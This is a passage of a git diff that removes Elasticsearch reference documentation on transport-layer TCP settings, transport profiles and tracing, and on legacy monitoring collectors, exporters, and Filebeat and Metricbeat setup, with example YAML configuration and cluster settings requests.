`network.tcp.no_delay`. - -`transport.tcp.keep_alive`:: -(<>) -Configures the `SO_KEEPALIVE` option for this socket, which -determines whether it sends TCP keepalive probes. -Defaults to `network.tcp.keep_alive`. - -`transport.tcp.keep_idle`:: -(<>) -Configures the `TCP_KEEPIDLE` option for this socket, which -determines the time in seconds that a connection must be idle before -starting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle` if set, -or the system default otherwise. -This value cannot exceed `300` seconds. In cases where the system default -is higher than `300`, the value is automatically lowered to `300`. Only applicable on -Linux and macOS, and requires Java 11 or newer. - -`transport.tcp.keep_interval`:: -(<>) -Configures the `TCP_KEEPINTVL` option for this socket, -which determines the time in seconds between sending TCP keepalive probes. -Defaults to `network.tcp.keep_interval` if set, or the system default otherwise. -This value cannot exceed `300` seconds. In cases where the system default is higher than `300`, -the value is automatically lowered to `300`. Only applicable on Linux and macOS, -and requires Java 11 or newer. - -`transport.tcp.keep_count`:: -(<>) -Configures the `TCP_KEEPCNT` option for this socket, which -determines the number of unacknowledged TCP keepalive probes that may be -sent on a connection before it is dropped. Defaults to `network.tcp.keep_count` -if set, or the system default otherwise. Only applicable on Linux and macOS, and -requires Java 11 or newer. - -`transport.tcp.reuse_address`:: -(<>) -Should an address be reused or not. Defaults to `network.tcp.reuse_address`. - -`transport.tcp.send_buffer_size`:: -(<>) -The size of the TCP send buffer (specified with <>). -Defaults to `network.tcp.send_buffer_size`. - -`transport.tcp.receive_buffer_size`:: -(<>) -The size of the TCP receive buffer (specified with <>). -Defaults to `network.tcp.receive_buffer_size`. - -[[transport-profiles]] -===== Transport profiles - -Elasticsearch allows you to bind to multiple ports on different interfaces by -the use of transport profiles. See this example configuration - -[source,yaml] --------------- -transport.profiles.default.port: 9300-9400 -transport.profiles.default.bind_host: 10.0.0.1 -transport.profiles.client.port: 9500-9600 -transport.profiles.client.bind_host: 192.168.0.1 -transport.profiles.dmz.port: 9700-9800 -transport.profiles.dmz.bind_host: 172.16.1.2 --------------- - -The `default` profile is special. It is used as a fallback for any other -profiles, if those do not have a specific configuration setting set, and is how -this node connects to other nodes in the cluster. - -The following parameters can be configured on each transport profile, as in the -example above: - -* `port`: The port to which to bind. -* `bind_host`: The host to which to bind. -* `publish_host`: The host which is published in informational APIs. - -Profiles also support all the other transport settings specified in the -<> section, and use these as defaults. -For example, `transport.profiles.client.tcp.reuse_address` can be explicitly -configured, and defaults otherwise to `transport.tcp.reuse_address`. - -[[long-lived-connections]] -===== Long-lived idle connections - -A transport connection between two nodes is made up of a number of long-lived -TCP connections, some of which may be idle for an extended period of time. -Nonetheless, Elasticsearch requires these connections to remain open, and it -can disrupt the operation of your cluster if any inter-node connections are -closed by an external influence such as a firewall. It is important to -configure your network to preserve long-lived idle connections between -Elasticsearch nodes, for instance by leaving `tcp.keep_alive` enabled and -ensuring that the keepalive interval is shorter than any timeout that might -cause idle connections to be closed, or by setting `transport.ping_schedule` if -keepalives cannot be configured. Devices which drop connections when they reach -a certain age are a common source of problems to Elasticsearch clusters, and -must not be used. - -[[request-compression]] -===== Request compression - -By default, the `transport.compress` setting is `false` and network-level -request compression is disabled between nodes in the cluster. This default -normally makes sense for local cluster communication as compression has a -noticeable CPU cost and local clusters tend to be set up with fast network -connections between nodes. - -The `transport.compress` setting always configures local cluster request -compression and is the fallback setting for remote cluster request compression. -If you want to configure remote request compression differently than local -request compression, you can set it on a per-remote cluster basis using the -<>. - - -[[response-compression]] -===== Response compression - -The compression settings do not configure compression for responses. {es} will -compress a response if the inbound request was compressed--even when compression -is not enabled. Similarly, {es} will not compress a response if the inbound -request was uncompressed--even when compression is enabled. - - -[[transport-tracer]] -==== Transport tracer - -The transport layer has a dedicated tracer logger which, when activated, logs incoming and out going requests. The log can be dynamically activated -by setting the level of the `org.elasticsearch.transport.TransportService.tracer` logger to `TRACE`: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "logger.org.elasticsearch.transport.TransportService.tracer" : "TRACE" - } -} --------------------------------------------------- - -You can also control which actions will be traced, using a set of include and exclude wildcard patterns. By default every request will be traced -except for fault detection pings: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "transport.tracer.include" : "*", - "transport.tracer.exclude" : "internal:coordination/fault_detection/*" - } -} --------------------------------------------------- diff --git a/docs/reference/monitoring/collecting-monitoring-data.asciidoc b/docs/reference/monitoring/collecting-monitoring-data.asciidoc deleted file mode 100644 index e7838480143..00000000000 --- a/docs/reference/monitoring/collecting-monitoring-data.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[role="xpack"] -[testenv="gold"] -[[collecting-monitoring-data]] -== Collecting monitoring data using legacy collectors -++++ -Legacy collection methods -++++ - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -This method for collecting metrics about {es} involves sending the metrics to -the monitoring cluster by using exporters. For the recommended method, see <>. - -Advanced monitoring settings enable you to control how frequently data is -collected, configure timeouts, and set the retention period for locally-stored -monitoring indices. You can also adjust how monitoring data is displayed. - -To learn about monitoring in general, see <>. - -. Configure your cluster to collect monitoring data: - -.. Verify that the `xpack.monitoring.elasticsearch.collection.enabled` setting -is `true`, which is its default value, on each node in the cluster. -+ --- -NOTE: You can specify this setting in either the `elasticsearch.yml` on each -node or across the cluster as a dynamic cluster setting. If {es} -{security-features} are enabled, you must have `monitor` cluster privileges to -view the cluster settings and `manage` cluster privileges to change them. - -For more information, see <> and <>. --- - -.. Set the `xpack.monitoring.collection.enabled` setting to `true` on each -node in the cluster. By default, it is is disabled (`false`). -+ --- -NOTE: You can specify this setting in either the `elasticsearch.yml` on each -node or across the cluster as a dynamic cluster setting. If {es} -{security-features} are enabled, you must have `monitor` cluster privileges to -view the cluster settings and `manage` cluster privileges to change them. - -For example, use the following APIs to review and change this setting: - -[source,console] ----------------------------------- -GET _cluster/settings - -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.collection.enabled": true - } -} ----------------------------------- - -Alternatively, you can enable this setting in {kib}. In the side navigation, -click *Monitoring*. If data collection is disabled, you are prompted to turn it -on. - -For more -information, see <> and <>. --- - -.. Optional: Specify which indices you want to monitor. -+ --- -By default, the monitoring agent collects data from all {es} indices. -To collect data from particular indices, configure the -`xpack.monitoring.collection.indices` setting. You can specify multiple indices -as a comma-separated list or use an index pattern to match multiple indices. For -example: - -[source,yaml] ----------------------------------- -xpack.monitoring.collection.indices: logstash-*, index1, test2 ----------------------------------- - -You can prepend `-` to explicitly exclude index names or -patterns. For example, to include all indices that start with `test` except -`test3`, you could specify `test*,-test3`. To include system indices such as -.security and .kibana, add `.*` to the list of included names. -For example `.*,test*,-test3` --- - -.. Optional: Specify how often to collect monitoring data. The default value for -the `xpack.monitoring.collection.interval` setting 10 seconds. See -<>. - -. Identify where to store monitoring data. -+ --- -By default, the data is stored on the same cluster by using a -<>. Alternatively, you can use an <> to send data to -a separate _monitoring cluster_. - -IMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the -cluster that stores the monitoring data must have at least one -<>. - -For more information about typical monitoring architectures, -see <>. --- - -. If you choose to use an `http` exporter: - -.. On the cluster that you want to monitor (often called the _production cluster_), -configure each node to send metrics to your monitoring cluster. Configure an -HTTP exporter in the `xpack.monitoring.exporters` settings in the -`elasticsearch.yml` file. For example: -+ --- -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["http://es-mon-1:9200", "http://es-mon2:9200"] --------------------------------------------------- --- - -.. If the Elastic {security-features} are enabled on the monitoring cluster, you -must provide appropriate credentials when data is shipped to the monitoring cluster: - -... Create a user on the monitoring cluster that has the -<>. -Alternatively, use the -<>. - -... Add the user ID and password settings to the HTTP exporter settings in the -`elasticsearch.yml` file on each node. + -+ --- -For example: - -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["http://es-mon-1:9200", "http://es-mon2:9200"] - auth.username: remote_monitoring_user - auth.password: YOUR_PASSWORD --------------------------------------------------- --- - -.. If you configured the monitoring cluster to use -<>, you must use the HTTPS protocol in -the `host` setting. You must also specify the trusted CA certificates that will -be used to verify the identity of the nodes in the monitoring cluster. - -*** To add a CA certificate to an {es} node's trusted certificates, you can -specify the location of the PEM encoded certificate with the -`certificate_authorities` setting. For example: -+ --- -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["https://es-mon1:9200", "https://es-mon2:9200"] - auth: - username: remote_monitoring_user - password: YOUR_PASSWORD - ssl: - certificate_authorities: [ "/path/to/ca.crt" ] --------------------------------------------------- --- - -*** Alternatively, you can configure trusted certificates using a truststore -(a Java Keystore file that contains the certificates). For example: -+ --- -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["https://es-mon1:9200", "https://es-mon2:9200"] - auth: - username: remote_monitoring_user - password: YOUR_PASSWORD - ssl: - truststore.path: /path/to/file - truststore.password: password --------------------------------------------------- --- - -. Configure your cluster to route monitoring data from sources such as {kib}, -Beats, and {ls} to the monitoring cluster. For information about configuring -each product to collect and send monitoring data, see <>. - -. If you updated settings in the `elasticsearch.yml` files on your production -cluster, restart {es}. See <> and <>. -+ --- -TIP: You may want to temporarily {ref}/modules-cluster.html[disable shard -allocation] before you restart your nodes to avoid unnecessary shard -reallocation during the install process. - --- - -. Optional: -<>. - -. {kibana-ref}/monitoring-data.html[View the monitoring data in {kib}]. diff --git a/docs/reference/monitoring/collectors.asciidoc b/docs/reference/monitoring/collectors.asciidoc deleted file mode 100644 index c64915ce94e..00000000000 --- a/docs/reference/monitoring/collectors.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[es-monitoring-collectors]] -== Collectors - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -Collectors, as their name implies, collect things. Each collector runs once for -each collection interval to obtain data from the public APIs in {es} and {xpack} -that it chooses to monitor. When the data collection is finished, the data is -handed in bulk to the <> to be sent to the -monitoring clusters. Regardless of the number of exporters, each collector only -runs once per collection interval. - -There is only one collector per data type gathered. In other words, for any -monitoring document that is created, it comes from a single collector rather -than being merged from multiple collectors. The {es} {monitor-features} -currently have a few collectors because the goal is to minimize overlap between -them for optimal performance. - -Each collector can create zero or more monitoring documents. For example, -the `index_stats` collector collects all index statistics at the same time to -avoid many unnecessary calls. - -[options="header"] -|======================= -| Collector | Data Types | Description -| Cluster Stats | `cluster_stats` -| Gathers details about the cluster state, including parts of the actual cluster -state (for example `GET /_cluster/state`) and statistics about it (for example, -`GET /_cluster/stats`). This produces a single document type. In versions prior -to X-Pack 5.5, this was actually three separate collectors that resulted in -three separate types: `cluster_stats`, `cluster_state`, and `cluster_info`. In -5.5 and later, all three are combined into `cluster_stats`. This only runs on -the _elected_ master node and the data collected (`cluster_stats`) largely -controls the UI. When this data is not present, it indicates either a -misconfiguration on the elected master node, timeouts related to the collection -of the data, or issues with storing the data. Only a single document is produced -per collection. -| Index Stats | `indices_stats`, `index_stats` -| Gathers details about the indices in the cluster, both in summary and -individually. This creates many documents that represent parts of the index -statistics output (for example, `GET /_stats`). This information only needs to -be collected once, so it is collected on the _elected_ master node. The most -common failure for this collector relates to an extreme number of indices -- and -therefore time to gather them -- resulting in timeouts. One summary -`indices_stats` document is produced per collection and one `index_stats` -document is produced per index, per collection. -| Index Recovery | `index_recovery` -| Gathers details about index recovery in the cluster. Index recovery represents -the assignment of _shards_ at the cluster level. If an index is not recovered, -it is not usable. This also corresponds to shard restoration via snapshots. This -information only needs to be collected once, so it is collected on the _elected_ -master node. The most common failure for this collector relates to an extreme -number of shards -- and therefore time to gather them -- resulting in timeouts. -This creates a single document that contains all recoveries by default, which -can be quite large, but it gives the most accurate picture of recovery in the -production cluster. -| Shards | `shards` -| Gathers details about all _allocated_ shards for all indices, particularly -including what node the shard is allocated to. This information only needs to be -collected once, so it is collected on the _elected_ master node. The collector -uses the local cluster state to get the routing table without any network -timeout issues unlike most other collectors. Each shard is represented by a -separate monitoring document. -| Jobs | `job_stats` -| Gathers details about all machine learning job statistics (for example, `GET -/_ml/anomaly_detectors/_stats`). This information only needs to be collected -once, so it is collected on the _elected_ master node. However, for the master -node to be able to perform the collection, the master node must have -`xpack.ml.enabled` set to true (default) and a license level that supports {ml}. -| Node Stats | `node_stats` -| Gathers details about the running node, such as memory utilization and CPU -usage (for example, `GET /_nodes/_local/stats`). This runs on _every_ node with -{monitor-features} enabled. One common failure results in the timeout of the node -stats request due to too many segment files. As a result, the collector spends -too much time waiting for the file system stats to be calculated until it -finally times out. A single `node_stats` document is created per collection. -This is collected per node to help to discover issues with nodes communicating -with each other, but not with the monitoring cluster (for example, intermittent -network issues or memory pressure). -|======================= - -The {es} {monitor-features} use a single threaded scheduler to run the -collection of {es} monitoring data by all of the appropriate collectors on each -node. This scheduler is managed locally by each node and its interval is -controlled by specifying the `xpack.monitoring.collection.interval`, which -defaults to 10 seconds (`10s`), at either the node or cluster level. - -Fundamentally, each collector works on the same principle. Per collection -interval, each collector is checked to see whether it should run and then the -appropriate collectors run. The failure of an individual collector does not -impact any other collector. - -Once collection has completed, all of the monitoring data is passed to the -exporters to route the monitoring data to the monitoring clusters. - -If gaps exist in the monitoring charts in {kib}, it is typically because either -a collector failed or the monitoring cluster did not receive the data (for -example, it was being restarted). In the event that a collector fails, a logged -error should exist on the node that attempted to perform the collection. - -NOTE: Collection is currently done serially, rather than in parallel, to avoid - extra overhead on the elected master node. The downside to this approach - is that collectors might observe a different version of the cluster state - within the same collection period. In practice, this does not make a - significant difference and running the collectors in parallel would not - prevent such a possibility. - -For more information about the configuration options for the collectors, see -<>. - -[discrete] -[[es-monitoring-stack]] -==== Collecting data from across the Elastic Stack - -{es} {monitor-features} also receive monitoring data from other parts of the -Elastic Stack. In this way, it serves as an unscheduled monitoring data -collector for the stack. - -By default, data collection is disabled. {es} monitoring data is not -collected and all monitoring data from other sources such as {kib}, Beats, and -Logstash is ignored. You must set `xpack.monitoring.collection.enabled` to `true` -to enable the collection of monitoring data. See <>. - -Once data is received, it is forwarded to the exporters -to be routed to the monitoring cluster like all monitoring data. - -WARNING: Because this stack-level "collector" lives outside of the collection -interval of {es} {monitor-features}, it is not impacted by the -`xpack.monitoring.collection.interval` setting. Therefore, data is passed to the -exporters whenever it is received. This behavior can result in indices for {kib}, -Logstash, or Beats being created somewhat unexpectedly. - -While the monitoring data is collected and processed, some production cluster -metadata is added to incoming documents. This metadata enables {kib} to link the -monitoring data to the appropriate cluster. If this linkage is unimportant to -the infrastructure that you're monitoring, it might be simpler to configure -Logstash and Beats to report monitoring data directly to the monitoring cluster. -This scenario also prevents the production cluster from adding extra overhead -related to monitoring data, which can be very useful when there are a large -number of Logstash nodes or Beats. - -For more information about typical monitoring architectures, see -<>. diff --git a/docs/reference/monitoring/configuring-filebeat.asciidoc b/docs/reference/monitoring/configuring-filebeat.asciidoc deleted file mode 100644 index 0331d4eab94..00000000000 --- a/docs/reference/monitoring/configuring-filebeat.asciidoc +++ /dev/null @@ -1,187 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[configuring-filebeat]] -== Collecting {es} log data with {filebeat} - -[subs="attributes"] -++++ -Collecting log data with {filebeat} -++++ - -You can use {filebeat} to monitor the {es} log files, collect log events, and -ship them to the monitoring cluster. Your recent logs are visible on the -*Monitoring* page in {kib}. - -//NOTE: The tagged regions are re-used in the Stack Overview. - -. Verify that {es} is running and that the monitoring cluster is ready to -receive data from {filebeat}. -+ --- -TIP: In production environments, we strongly recommend using a separate cluster -(referred to as the _monitoring cluster_) to store the data. Using a separate -monitoring cluster prevents production cluster outages from impacting your -ability to access your monitoring data. It also prevents monitoring activities -from impacting the performance of your production cluster. See -<>. - --- - -. Enable the collection of monitoring data on your cluster. -+ --- -include::configuring-metricbeat.asciidoc[tag=enable-collection] - -For more information, see <> and <>. --- - -. Identify which logs you want to monitor. -+ --- -The {filebeat} {es} module can handle -<>, -<>, -<>, <>, and -<>. -For more information about the location of your {es} logs, see the -<> setting. - -IMPORTANT: If there are both structured (`*.json`) and unstructured (plain text) -versions of the logs, you must use the structured logs. Otherwise, they might -not appear in the appropriate context in {kib}. - --- - -. {filebeat-ref}/filebeat-installation-configuration.html[Install {filebeat}] on the {es} -nodes that contain logs that you want to monitor. - -. Identify where to send the log data. -+ --- -// tag::output-elasticsearch[] -For example, specify {es} output information for your monitoring cluster in -the {filebeat} configuration file (`filebeat.yml`): - -[source,yaml] ----------------------------------- -output.elasticsearch: - # Array of hosts to connect to. - hosts: ["http://es-mon-1:9200", "http://es-mon2:9200"] <1> - - # Optional protocol and basic auth credentials. - #protocol: "https" - #username: "elastic" - #password: "changeme" ----------------------------------- -<1> In this example, the data is stored on a monitoring cluster with nodes -`es-mon-1` and `es-mon-2`. - -If you configured the monitoring cluster to use encrypted communications, you -must access it via HTTPS. For example, use a `hosts` setting like -`https://es-mon-1:9200`. - -IMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the -cluster that stores the monitoring data must have at least one -<>. - -If {es} {security-features} are enabled on the monitoring cluster, you must -provide a valid user ID and password so that {filebeat} can send metrics -successfully. - -For more information about these configuration options, see -{filebeat-ref}/elasticsearch-output.html[Configure the {es} output]. -// end::output-elasticsearch[] --- - -. Optional: Identify where to visualize the data. -+ --- -// tag::setup-kibana[] -{filebeat} provides example {kib} dashboards, visualizations and searches. To -load the dashboards into the appropriate {kib} instance, specify the -`setup.kibana` information in the {filebeat} configuration file -(`filebeat.yml`) on each node: - -[source,yaml] ----------------------------------- -setup.kibana: - host: "localhost:5601" - #username: "my_kibana_user" - #password: "YOUR_PASSWORD" ----------------------------------- - -TIP: In production environments, we strongly recommend using a dedicated {kib} -instance for your monitoring cluster. - -If {security-features} are enabled, you must provide a valid user ID and -password so that {filebeat} can connect to {kib}: - -.. Create a user on the monitoring cluster that has the -<> or equivalent -privileges. - -.. Add the `username` and `password` settings to the {es} output information in -the {filebeat} configuration file. The example shows a hard-coded password, but -you should store sensitive values in the -{filebeat-ref}/keystore.html[secrets keystore]. - -See {filebeat-ref}/setup-kibana-endpoint.html[Configure the {kib} endpoint]. - -// end::setup-kibana[] --- - -. Enable the {es} module and set up the initial {filebeat} environment on each -node. -+ --- -// tag::enable-es-module[] -For example: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------------- -filebeat modules enable elasticsearch -filebeat setup -e ----------------------------------------------------------------------- - -For more information, see -{filebeat-ref}/filebeat-module-elasticsearch.html[{es} module]. - -// end::enable-es-module[] --- - -. Configure the {es} module in {filebeat} on each node. -+ --- -// tag::configure-es-module[] -If the logs that you want to monitor aren't in the default location, set the -appropriate path variables in the `modules.d/elasticsearch.yml` file. See -{filebeat-ref}/filebeat-module-elasticsearch.html#configuring-elasticsearch-module[Configure the {es} module]. - -IMPORTANT: If there are JSON logs, configure the `var.paths` settings to point -to them instead of the plain text logs. - -// end::configure-es-module[] --- - -. {filebeat-ref}/filebeat-starting.html[Start {filebeat}] on each node. -+ --- -NOTE: Depending on how you’ve installed {filebeat}, you might see errors related -to file ownership or permissions when you try to run {filebeat} modules. See -{beats-ref}/config-file-permissions.html[Config file ownership and permissions]. - --- - -. Check whether the appropriate indices exist on the monitoring cluster. -+ --- -For example, use the <> command to verify -that there are new `filebeat-*` indices. - -TIP: If you want to use the *Monitoring* UI in {kib}, there must also be -`.monitoring-*` indices. Those indices are generated when you collect metrics -about {stack} products. For example, see <>. - --- - -. {kibana-ref}/monitoring-data.html[View the monitoring data in {kib}]. diff --git a/docs/reference/monitoring/configuring-metricbeat.asciidoc b/docs/reference/monitoring/configuring-metricbeat.asciidoc deleted file mode 100644 index 4641457d421..00000000000 --- a/docs/reference/monitoring/configuring-metricbeat.asciidoc +++ /dev/null @@ -1,197 +0,0 @@ -[role="xpack"] -[testenv="gold"] -[[configuring-metricbeat]] -== Collecting {es} monitoring data with {metricbeat} - -[subs="attributes"] -++++ -Collecting monitoring data with {metricbeat} -++++ - -In 6.5 and later, you can use {metricbeat} to collect data about {es} -and ship it to the monitoring cluster, rather than routing it through exporters -as described in <>. - -image::monitoring/images/metricbeat.png[Example monitoring architecture] - -. Enable the collection of monitoring data. -+ --- -// tag::enable-collection[] -Set `xpack.monitoring.collection.enabled` to `true` on the -production cluster. By default, it is is disabled (`false`). - -You can use the following APIs to review and change this setting: - -[source,console] ----------------------------------- -GET _cluster/settings - -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.collection.enabled": true - } -} ----------------------------------- - -If {es} {security-features} are enabled, you must have `monitor` cluster privileges to -view the cluster settings and `manage` cluster privileges to change them. -// end::enable-collection[] - -For more information, see <> and <>. --- - -. {metricbeat-ref}/metricbeat-installation-configuration.html[Install {metricbeat}] on each -{es} node in the production cluster. Failure to install on each node may result in incomplete or missing results. - -. Enable the {es} {xpack} module in {metricbeat} on each {es} node. -+ --- -For example, to enable the default configuration in the `modules.d` directory, -run the following command: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------------- -metricbeat modules enable elasticsearch-xpack ----------------------------------------------------------------------- - -Alternatively, you can use the {es} module, as described in the -{metricbeat-ref}/metricbeat-module-elasticsearch.html[{es} module usage for {stack} monitoring]. --- - -. Configure the {es} {xpack} module in {metricbeat} on each {es} node. -+ --- -The `modules.d/elasticsearch-xpack.yml` file contains the following settings: - -[source,yaml] ----------------------------------- - - module: elasticsearch - xpack.enabled: true - period: 10s - hosts: ["http://localhost:9200"] <1> - #scope: node <2> - #username: "user" - #password: "secret" - #ssl.enabled: true - #ssl.certificate_authorities: ["/etc/pki/root/ca.pem"] - #ssl.certificate: "/etc/pki/client/cert.pem" - #ssl.key: "/etc/pki/client/cert.key" - #ssl.verification_mode: "full" ----------------------------------- -<1> By default, the module collects {es} monitoring metrics from -`http://localhost:9200`. If that host and port number are not correct, you must -update the `hosts` setting. If you configured {es} to use encrypted -communications, you must access it via HTTPS. For example, use a `hosts` setting -like `https://localhost:9200`. -<2> By default, `scope` is set to `node` and each entry in the `hosts` list -indicates a distinct node in an {es} cluster. If you set `scope` to `cluster`, -each entry in the `hosts` list indicates a single endpoint for a distinct {es} -cluster (for example, a load-balancing proxy fronting the cluster). - -If Elastic {security-features} are enabled, you must also provide a user ID -and password so that {metricbeat} can collect metrics successfully: - -.. Create a user on the production cluster that has the -<>. -Alternatively, use the -<>. - -.. Add the `username` and `password` settings to the {es} module configuration -file. - -.. If TLS is enabled on the HTTP layer of your {es} cluster, you must either use https as the URL scheme in the `hosts` setting or add the `ssl.enabled: true` setting. Depending on the TLS configuration of your {es} cluster, you might also need to specify {metricbeat-ref}/configuration-ssl.html[additional ssl.*] settings. --- - -. Optional: Disable the system module in {metricbeat}. -+ --- -By default, the {metricbeat-ref}/metricbeat-module-system.html[system module] is -enabled. The information it collects, however, is not shown on the *Monitoring* -page in {kib}. Unless you want to use that information for other purposes, run -the following command: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------------- -metricbeat modules disable system ----------------------------------------------------------------------- - --- - -. Identify where to send the monitoring data. -+ --- -TIP: In production environments, we strongly recommend using a separate cluster -(referred to as the _monitoring cluster_) to store the data. Using a separate -monitoring cluster prevents production cluster outages from impacting your -ability to access your monitoring data. It also prevents monitoring activities -from impacting the performance of your production cluster. - -For example, specify the {es} output information in the {metricbeat} -configuration file (`metricbeat.yml`): - -[source,yaml] ----------------------------------- -output.elasticsearch: - # Array of hosts to connect to. - hosts: ["http://es-mon-1:9200", "http://es-mon2:9200"] <1> - - # Optional protocol and basic auth credentials. - #protocol: "https" - #username: "elastic" - #password: "changeme" ----------------------------------- -<1> In this example, the data is stored on a monitoring cluster with nodes -`es-mon-1` and `es-mon-2`. - -If you configured the monitoring cluster to use encrypted communications, you -must access it via HTTPS. For example, use a `hosts` setting like -`https://es-mon-1:9200`. - -IMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the -cluster that stores the monitoring data must have at least one -<>. - -If {es} {security-features} are enabled on the monitoring cluster, you must -provide a valid user ID and password so that {metricbeat} can send metrics -successfully: - -.. Create a user on the monitoring cluster that has the -<>. -Alternatively, use the -<>. - -.. Add the `username` and `password` settings to the {es} output information in -the {metricbeat} configuration file. - -For more information about these configuration options, see -{metricbeat-ref}/elasticsearch-output.html[Configure the {es} output]. --- - -. {metricbeat-ref}/metricbeat-starting.html[Start {metricbeat}] on each node. - -. Disable the default collection of {es} monitoring metrics. -+ --- -Set `xpack.monitoring.elasticsearch.collection.enabled` to `false` on the -production cluster. - -You can use the following API to change this setting: - -[source,console] ----------------------------------- -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.elasticsearch.collection.enabled": false - } -} ----------------------------------- - -If {es} {security-features} are enabled, you must have `monitor` cluster -privileges to view the cluster settings and `manage` cluster privileges -to change them. --- - -. {kibana-ref}/monitoring-data.html[View the monitoring data in {kib}]. diff --git a/docs/reference/monitoring/exporters.asciidoc b/docs/reference/monitoring/exporters.asciidoc deleted file mode 100644 index 76bf30d0b61..00000000000 --- a/docs/reference/monitoring/exporters.asciidoc +++ /dev/null @@ -1,172 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[es-monitoring-exporters]] -== Exporters - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -The purpose of exporters is to take data collected from any Elastic Stack -source and route it to the monitoring cluster. It is possible to configure -more than one exporter, but the general and default setup is to use a single -exporter. - -There are two types of exporters in {es}: - -`local`:: -The default exporter used by {es} {monitor-features}. This exporter routes data -back into the _same_ cluster. See <>. - -`http`:: -The preferred exporter, which you can use to route data into any supported -{es} cluster accessible via HTTP. Production environments should always use a -separate monitoring cluster. See <>. - -Both exporters serve the same purpose: to set up the monitoring cluster and route -monitoring data. However, they perform these tasks in very different ways. Even -though things happen differently, both exporters are capable of sending all of -the same data. - -Exporters are configurable at both the node and cluster level. Cluster-wide -settings, which are updated with the -<>, take precedence over -settings in the `elasticsearch.yml` file on each node. When you update an -exporter, it is completely replaced by the updated version of the exporter. - -IMPORTANT: It is critical that all nodes share the same setup. Otherwise, -monitoring data might be routed in different ways or to different places. - -When the exporters route monitoring data into the monitoring cluster, they use -`_bulk` indexing for optimal performance. All monitoring data is forwarded in -bulk to all enabled exporters on the same node. From there, the exporters -serialize the monitoring data and send a bulk request to the monitoring cluster. -There is no queuing--in memory or persisted to disk--so any failure during the -export results in the loss of that batch of monitoring data. This design limits -the impact on {es} and the assumption is that the next pass will succeed. - -Routing monitoring data involves indexing it into the appropriate monitoring -indices. Once the data is indexed, it exists in a monitoring index that, by -default, is named with a daily index pattern. For {es} monitoring data, this is -an index that matches `.monitoring-es-6-*`. From there, the data lives inside -the monitoring cluster and must be curated or cleaned up as necessary. If you do -not curate the monitoring data, it eventually fills up the nodes and the cluster -might fail due to lack of disk space. - -TIP: You are strongly recommended to manage the curation of indices and -particularly the monitoring indices. To do so, you can take advantage of the -<> or -{curator-ref-current}/index.html[Elastic Curator]. - -//TO-DO: Add information about index lifecycle management https://github.com/elastic/x-pack-elasticsearch/issues/2814 - -There is also a disk watermark (known as the flood stage -watermark), which protects clusters from running out of disk space. When this -feature is triggered, it makes all indices (including monitoring indices) -read-only until the issue is fixed and a user manually makes the index writeable -again. While an active monitoring index is read-only, it will naturally fail to -write (index) new data and will continuously log errors that indicate the write -failure. For more information, see <>. - -[discrete] -[[es-monitoring-default-exporter]] -=== Default exporters - -If a node or cluster does not explicitly define an exporter, the following -default exporter is used: - -[source,yaml] ---------------------------------------------------- -xpack.monitoring.exporters.default_local: <1> - type: local ---------------------------------------------------- -<1> The exporter name uniquely defines the exporter, but it is otherwise unused. - When you specify your own exporters, you do not need to explicitly overwrite - or reference `default_local`. - -If another exporter is already defined, the default exporter is _not_ created. -When you define a new exporter, if the default exporter exists, it is -automatically removed. - -[discrete] -[[es-monitoring-templates]] -=== Exporter templates and ingest pipelines - -Before exporters can route monitoring data, they must set up certain {es} -resources. These resources include templates and ingest pipelines. The -following table lists the templates that are required before an exporter can -route monitoring data: - -[options="header"] -|======================= -| Template | Purpose -| `.monitoring-alerts` | All cluster alerts for monitoring data. -| `.monitoring-beats` | All Beats monitoring data. -| `.monitoring-es` | All {es} monitoring data. -| `.monitoring-kibana` | All {kib} monitoring data. -| `.monitoring-logstash` | All Logstash monitoring data. -|======================= - -The templates are ordinary {es} templates that control the default settings and -mappings for the monitoring indices. - -By default, monitoring indices are created daily (for example, -`.monitoring-es-6-2017.08.26`). You can change the default date suffix for -monitoring indices with the `index.name.time_format` setting. You can use this -setting to control how frequently monitoring indices are created by a specific -`http` exporter. You cannot use this setting with `local` exporters. For more -information, see <>. - -WARNING: Some users create their own templates that match _all_ index patterns, -which therefore impact the monitoring indices that get created. It is critical -that you do not disable `_source` storage for the monitoring indices. If you do, -{kib} {monitor-features} do not work and you cannot visualize monitoring data -for your cluster. - -The following table lists the ingest pipelines that are required before an -exporter can route monitoring data: - -[options="header"] -|======================= -| Pipeline | Purpose -| `xpack_monitoring_2` | Upgrades X-Pack monitoring data coming from X-Pack -5.0 - 5.4 to be compatible with the format used in 5.5 {monitor-features}. -| `xpack_monitoring_6` | A placeholder pipeline that is empty. -|======================= - -Exporters handle the setup of these resources before ever sending data. If -resource 